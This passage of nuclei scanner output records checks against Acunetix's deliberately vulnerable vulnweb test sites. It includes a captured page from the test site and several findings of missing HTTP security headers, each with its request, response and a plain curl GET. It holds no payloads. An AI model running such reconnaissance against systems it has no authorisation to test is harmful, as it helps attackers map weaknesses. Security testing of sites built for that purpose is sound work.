type=\\\"hidden\\\" name=\\\"__EVENTARGUMENT\\\" id=\\\"__EVENTARGUMENT\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATE\\\" id=\\\"__VIEWSTATE\\\" value=\\\"/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\r\\n\\u003cscript type=\\\"text/javascript\\\"\\u003e\\r\\n//\\u003c![CDATA[\\r\\nvar theForm = document.forms['Form1'];\\r\\nif (!theForm) {\\r\\n theForm = document.Form1;\\r\\n}\\r\\nfunction __doPostBack(eventTarget, eventArgument) {\\r\\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\\r\\n theForm.__EVENTTARGET.value = eventTarget;\\r\\n theForm.__EVENTARGUMENT.value = eventArgument;\\r\\n theForm.submit();\\r\\n }\\r\\n}\\r\\n//]]\\u003e\\r\\n\\u003c/script\\u003e\\r\\n\\r\\n\\r\\n\\u003cdiv\\u003e\\r\\n\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATEGENERATOR\\\" id=\\\"__VIEWSTATEGENERATOR\\\" value=\\\"CA0B0334\\\" /\\u003e\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTVALIDATION\\\" id=\\\"__EVENTVALIDATION\\\" value=\\\"/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\t\\t\\t\\r\\n\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"COLOR: #e6dccf\\\" bgColor=\\\"#806640\\\" height=\\\"75\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cIMG src=\\\"images/logo_acunetix.gif\\\" align=\\\"absMiddle\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf\\\" align=\\\"right\\\" bgColor=\\\"#806640\\\"\\r\\n\\t\\t\\theight=\\\"75\\\"\\u003eTest Website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\u003cTABLE id=\\\"Table2\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD class=\\\"MenuBar\\\" style=\\\"BORDER-LEFT: #806040 1px solid\\\"\\u003e\\u003cA class=\\\"menu\\\" title=\\\"About\\\" href=\\\"about.aspx\\\"\\u003eabout\\u003c/A\\u003e\\r\\n\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Latest news\\\" href=\\\"default.aspx\\\"\\u003enews\\u003c/A\\u003e \\u003ca href=\\\"login.aspx\\\" id=\\\"Mainmenu2_lnkLog\\\" class=\\\"menu\\\" name=\\\"lnkLog\\\"\\u003elogin\\u003c/a\\u003e \\u003ca href=\\\"Signup.aspx\\\" id=\\\"Mainmenu2_lnkSignup\\\" class=\\\"menu\\\" name=\\\"lnkSignup\\\"\\u003e\\r\\n\\t\\t\\t\\tsignup\\u003c/a\\u003e \\u003cA class=\\\"menu\\\" title=\\\"Network scanner\\\" href=\\\"https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/\\\"\\u003enetwork scanner\\u003c/A\\u003e\\r\\n\\t\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Network vuln help\\\" href=\\\"https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/\\\"\\u003enetwork vuln help\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\u003ctd class=\\\"MenuBar\\\" align=\\\"right\\\" width=\\\"50px\\\"\\u003e\\r\\n\\t\\t\\t\\u003cA href=\\\"rssFeed.aspx\\\"\\u003e\\u003cIMG src=\\\"images/rss.gif\\\" border=\\\"0\\\"\\u003e\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/td\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\r\\n\\t\\t\\t\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"10\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD id=\\\"tdPageData\\\" valign=\\\"top\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 5/16/2019 12:32:30 PM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=0\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=0\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Vulnerability Scanner Now With Network Security Scans\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003eSeamless OpenVAS integration now also available on Windows and Linux\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:37:35 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=3\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=3\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Web Vulnerability Scanner beta released!\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:35:22 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=2\\\" class=\\\"NewsOperation\\\"\\u003e(41) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=2\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eWeb attacks - can your web applications withstand the force?\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.\\u003c/DIV\\u003e\\u003c/TD\\u003e\\r\\n\\r\\n\\t\\t\\t\\t\\t\\u003cTD vAlign=\\\"top\\\" width=\\\"200\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\t\\u003ctable id=\\\"RightPanel1_Calendar\\\" class=\\\"Calendar\\\" cellspacing=\\\"0\\\" cellpadding=\\\"1\\\" title=\\\"Calendar\\\" border=\\\"0\\\" style=\\\"background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\u003ctr\\u003e\\u003ctd colspan=\\\"7\\\" style=\\\"background-color:#E6B873;\\\"\\u003e\\u003ctable class=\\\"Calendar\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\t\\u003ctr\\u003e\\u003ctd style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9040')\\\" style=\\\"color:Black\\\" title=\\\"Go to the previous month\\\"\\u003e\\u0026lt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:70%;\\\"\\u003eNovember 2024\\u003c/td\\u003e\\u003ctd align=\\\"right\\\" style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9101')\\\" style=\\\"color:Black\\\" title=\\\"Go to the next month\\\"\\u003e\\u0026gt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Sunday\\\" scope=\\\"col\\\"\\u003eSun\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Monday\\\" scope=\\\"col\\\"\\u003eMon\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Tuesday\\\" scope=\\\"col\\\"\\u003eTue\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Wednesday\\\" scope=\\\"col\\\"\\u003eWed\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Thursday\\\" scope=\\\"col\\\"\\u003eThu\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Friday\\\" scope=\\\"col\\\"\\u003eFri\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Saturday\\\" scope=\\\"col\\\"\\u003eSat\\u003c/th\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9066')\\\" style=\\\"color:Black\\\" title=\\\"October 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9067')\\\" style=\\\"color:Black\\\" title=\\\"October 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9068')\\\" style=\\\"color:Black\\\" title=\\\"October 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9069')\\\" style=\\\"color:Black\\\" title=\\\"October 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9070')\\\" style=\\\"color:Black\\\" title=\\\"October 31\\\"\\u003e31\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9071')\\\" style=\\\"color:Black\\\" title=\\\"November 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9072')\\\" style=\\\"color:Black\\\" title=\\\"November 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9073')\\\" style=\\\"color:Black\\\" title=\\\"November 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9074')\\\" style=\\\"color:Black\\\" title=\\\"November 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9075')\\\" style=\\\"color:Black\\\" title=\\\"November 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9076')\\\" style=\\\"color:Black\\\" title=\\\"November 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9077')\\\" style=\\\"color:Black\\\" title=\\\"November 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9078')\\\" style=\\\"color:Black\\\" title=\\\"November 08\\\"\\u003e8\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9079')\\\" style=\\\"color:Black\\\" title=\\\"November 09\\\"\\u003e9\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9080')\\\" style=\\\"color:Black\\\" title=\\\"November 10\\\"\\u003e10\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9081')\\\" style=\\\"color:Black\\\" title=\\\"November 11\\\"\\u003e11\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9082')\\\" style=\\\"color:Black\\\" title=\\\"November 12\\\"\\u003e12\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"border-color:#806640;width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9083')\\\" style=\\\"color:Black\\\" title=\\\"November 13\\\"\\u003e13\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9084')\\\" style=\\\"color:Black\\\" title=\\\"November 14\\\"\\u003e14\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9085')\\\" style=\\\"color:Black\\\" title=\\\"November 15\\\"\\u003e15\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9086')\\\" style=\\\"color:Black\\\" title=\\\"November 16\\\"\\u003e16\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9087')\\\" style=\\\"color:Black\\\" title=\\\"November 17\\\"\\u003e17\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9088')\\\" style=\\\"color:Black\\\" title=\\\"November 18\\\"\\u003e18\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9089')\\\" style=\\\"color:Black\\\" title=\\\"November 19\\\"\\u003e19\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9090')\\\" style=\\\"color:Black\\\" title=\\\"November 20\\\"\\u003e20\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9091')\\\" style=\\\"color:Black\\\" title=\\\"November 21\\\"\\u003e21\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9092')\\\" style=\\\"color:Black\\\" title=\\\"November 22\\\"\\u003e22\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9093')\\\" style=\\\"color:Black\\\" title=\\\"November 23\\\"\\u003e23\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9094')\\\" style=\\\"color:Black\\\" title=\\\"November 24\\\"\\u003e24\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9095')\\\" style=\\\"color:Black\\\" title=\\\"November 25\\\"\\u003e25\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9096')\\\" style=\\\"color:Black\\\" title=\\\"November 26\\\"\\u003e26\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9097')\\\" style=\\\"color:Black\\\" title=\\\"November 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9098')\\\" style=\\\"color:Black\\\" title=\\\"November 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9099')\\\" style=\\\"color:Black\\\" title=\\\"November 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9100')\\\" style=\\\"color:Black\\\" title=\\\"November 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9101')\\\" style=\\\"color:Black\\\" title=\\\"December 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9102')\\\" style=\\\"color:Black\\\" title=\\\"December 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9103')\\\" style=\\\"color:Black\\\" title=\\\"December 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9104')\\\" style=\\\"color:Black\\\" title=\\\"December 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9105')\\\" style=\\\"color:Black\\\" title=\\\"December 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9106')\\\" style=\\\"color:Black\\\" title=\\\"December 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9107')\\\" style=\\\"color:Black\\\" title=\\\"December 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\u003c/table\\u003e\\u003cBR\\u003e\\r\\n\\u003ca href=\\\"rssFeed.aspx\\\"\\u003eGet RSS feed\\u003c/a\\u003e\\r\\n\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD colSpan=\\\"2\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\u003c/TABLE\\u003e\\r\\n\\t\\t\\u003c/form\\u003e\\r\\n\\t\\u003c/body\\u003e\\r\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\t\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.\\u003c/p\\u003e\\r\\n\\t\\u003c/div\\u003e\\r\\n\\u003c/HTML\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:40:49.714270488Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/css\",\"path\":\"/static/css\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/css/\",\"request\":\"GET /static/css HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.898488264Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/css'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/T\",\"path\":\"/T\",\"matched-at\":\"http://testasp.vulnweb.com/T/\",\"request\":\"GET /T HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nContent-Length: 1233\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:46 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; 